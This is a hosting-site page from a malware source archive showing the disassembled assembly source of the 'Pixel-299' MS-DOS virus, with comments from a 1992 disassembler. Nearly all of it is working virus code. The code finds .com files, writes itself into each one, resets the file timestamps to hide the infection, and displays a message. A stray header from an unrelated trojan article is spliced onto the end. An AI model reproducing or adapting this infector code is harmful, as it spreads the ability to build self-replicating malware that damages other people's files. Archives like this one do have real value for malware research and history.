ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 01:46:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
736ac31400
MalwareSourceCode/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.299.asm

151 lines
5.7 KiB
NASM
Raw Normal View History

re-organize push
2022-08-21 09:07:57 +00:00
;*****************************************************************************
;
; Pixel - 299 virus
;
; Disassembled By Admiral Bailey [YAM '92]
;
; Notes: I dont know where the hell I got this one from but when I found it on
; one of my disks it was named incorectly. Some Amst shit but I looked
; it up in the vsum and its named as Pixel so Il use that name.
; Anyways its just a plain com infecting virus that displays a messege
; when executed. Nothing big.
;
;*****************************************************************************
data_1e equ 6Ch
data_2e equ 96h
data_3e equ 98h
data_4e equ 9Eh
data_15e equ 12Bh ;*
data_16e equ 12Dh ;*
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
Pixel proc far
start:
jmp short begin
dw 5649h
data_7 db 0
data_8 db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0 ; '*.com'
data_10 dw 0, 8918h
data_12 dw 0
begin: ; loc_1:
push ax
mov ax,cs
add ax,1000h
mov es,ax
inc data_7
mov si,100h
xor di,di ; Zero register
mov cx,12Bh
rep movsb ; Mov [si] to es:[di]
mov dx,offset data_8 ; load the type of file to find
mov cx,6 ; Im not sure what attrib
mov ah,4Eh ; Find first file
int 21h ;
jc quit ; if none found then...
get_file: ; loc_2
mov dx,data_4e ; file name
mov ax,3D02h ; open file
int 21h
mov bx,ax
push es
pop ds
mov dx,data_15e ; buffer for read
mov cx,0FFFFh ; number of bytes to read
mov ah,3Fh ; read file
int 21h
add ax,12Bh
mov cs:data_12,ax
cmp word ptr ds:data_16e,5649h ; probably comparing size
je not_this_file ; of file
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h ; move file pointer
int 21h
jc not_this_file ; if error the quit this file
xor dx,dx ; Zero register
mov cx,cs:data_12
mov ah,40h ; write virus to file
int 21h
mov cx,cs:data_2e ; old date
mov dx,cs:data_3e ; new time
mov ax,5701h ; set files date & time
int 21h
not_this_file: ; loc_3:
mov ah,3Eh ; close this file
int 21h
push cs
pop ds
mov ah,4Fh ; find another file
int 21h
jc quit ; if none found quit
jmp short get_file ; if found then infect
quit: ; loc_4
cmp data_7,5
jb loc_5 ; Jump if below
mov ax,40h
mov ds,ax
mov ax,ds:data_1e
push cs
pop ds
and ax,1
jz loc_5 ; Jump if zero
mov dx,offset data_13 ; gets the messege
mov ah,9 ; display string
int 21h
int 20h ; Quit program
data_13 db 'Program sick error:Call doctor o' ; messege
db 'r buy PIXEL for cure description' ; displayed when
db 0Ah, 0Dh, '$' ; run
loc_5:
mov si,offset data_14
mov cx,22h
xor di,di ; Zero register
rep movsb ; Rep when cx >0 Mov [si] to es
pop bx
mov cs:data_10,0
mov word ptr cs:data_10+2,es
jmp dword ptr cs:data_10
data_14 db 1Eh ; cant figure this
db 07h,0BEh, 2Bh, 02h,0BFh, 00h ; part out...
db 01h,0B9h,0FFh,0FFh, 2Bh,0CEh ; probably infected
db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h ; file before.
db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh
db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh
db 2Eh, 00h, 01h,0CDh ; this is an int 20h
db 20h
Pixel endp
seg_a ends
end start
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>>> Article From Evolution #1 - YAM '92
Article Title: Thrasher Trojan Disassembly
Author: Natas Kaupas
Reference in New Issue Copy Permalink